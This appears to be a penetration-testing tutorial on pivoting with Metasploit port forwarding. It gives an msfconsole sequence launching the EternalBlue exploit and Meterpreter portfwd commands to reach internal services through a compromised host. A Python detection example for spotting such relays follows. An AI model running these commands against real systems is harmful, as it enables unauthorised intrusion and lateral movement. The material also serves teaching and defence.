Zero Day Archives

Metasploit: Port Forwarding

Port Forwarding with Metasploit

Port forwarding allows you to access a service that is normally inaccessible from your attacking machine by forwarding the traffic through a compromised system. This is typically used to access internal services behind firewalls or NAT devices.

In Metasploit, port forwarding can be set up using a Meterpreter session. The compromised system can act as a relay to forward traffic to other internal services.

Setting Up Port Forwarding in Metasploit

Step 1: Compromise the Target

Just like in the network pivoting scenario, you must first compromise the target system and obtain a Meterpreter session.

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target_ip>
set LHOST <your_ip>
run

Once the exploit succeeds, you will have a Meterpreter session:

meterpreter > sessions

Step 2: Set Up Port Forwarding

To forward ports through the compromised system, use the portfwd command in Meterpreter. For example, to forward local port 8080 on your attacking machine to port 80 on the internal host 192.168.1.100, use:

meterpreter > portfwd add -l 8080 -p 80 -r 192.168.1.100

Here:

  • -l 8080 specifies the local port on your attacking machine.

  • -p 80 specifies the remote port on the internal target system.

  • -r 192.168.1.100 specifies the internal target system.

Now, when you access http://localhost:8080 on your attacking machine, the traffic will be forwarded to the internal web service running on 192.168.1.100:80.

Step 3: Verify Port Forwarding

To verify that the port forwarding is working, try accessing the forwarded port in your browser or using tools like curl or wget.

curl http://localhost:8080

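This should route your request through the compromised system to the internal service. From the internal service's point of view, the connection comes from the compromised system, not from your machine.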

Step 4: Remove Port Forwarding

Once you’re done with the port forwarding, you can remove it using the following command:

meterpreter > portfwd delete -l 8080

This will stop forwarding traffic from localhost:8080.
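Seen from the defender's side, the forward set up in the steps above appears as one process on the relay host that holds a connection to an external address while also opening connections to internal services. The following Python is an added example, not part of the original page: it flags that pattern in constructed records shaped like Sysmon Event ID 3 (network connection) fields. The field names, the allowlist, and every host, process and address in the sample are assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed sample records in the shape of Sysmon Event ID 3 fields;
# hosts, processes and addresses are illustrative only.
EVENTS = [
    {"host": "WS-07", "pid": 4312, "image": "spoolsv.exe", "dst": "203.0.113.50", "dport": 4444},
    {"host": "WS-07", "pid": 4312, "image": "spoolsv.exe", "dst": "192.168.1.100", "dport": 80},
    {"host": "WS-07", "pid": 988, "image": "chrome.exe", "dst": "198.51.100.20", "dport": 443},
    {"host": "WS-07", "pid": 1200, "image": "outlook.exe", "dst": "192.168.1.25", "dport": 443},
    {"host": "WS-09", "pid": 640, "image": "svchost.exe", "dst": "192.168.1.10", "dport": 445},
]

# RFC 1918 ranges treated as "internal" (assumption: adjust to your address plan).
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Hypothetical allowlist of processes expected to talk both inward and outward.
EXPECTED_DUAL = {"chrome.exe", "msedge.exe"}

def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL)

def find_relay_candidates(events):
    """Return processes that talk to both an external peer and internal services."""
    by_proc = defaultdict(lambda: {"external": set(), "internal": set()})
    for e in events:
        side = "internal" if is_internal(e["dst"]) else "external"
        key = (e["host"], e["pid"], e["image"].lower())
        by_proc[key][side].add((e["dst"], e["dport"]))
    hits = []
    for (host, pid, image), seen in sorted(by_proc.items()):
        # A relay needs both legs: the outward channel and the inward forward.
        if seen["external"] and seen["internal"] and image not in EXPECTED_DUAL:
            hits.append({"host": host, "pid": pid, "image": image,
                         "external": sorted(seen["external"]),
                         "internal": sorted(seen["internal"])})
    return hits

if __name__ == "__main__":
    for hit in find_relay_candidates(EVENTS):
        print(hit)
```

Because the internal service only ever logs the relay host as the client, correlating per-process connections on the relay itself is what ties the internal access back to the external peer.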
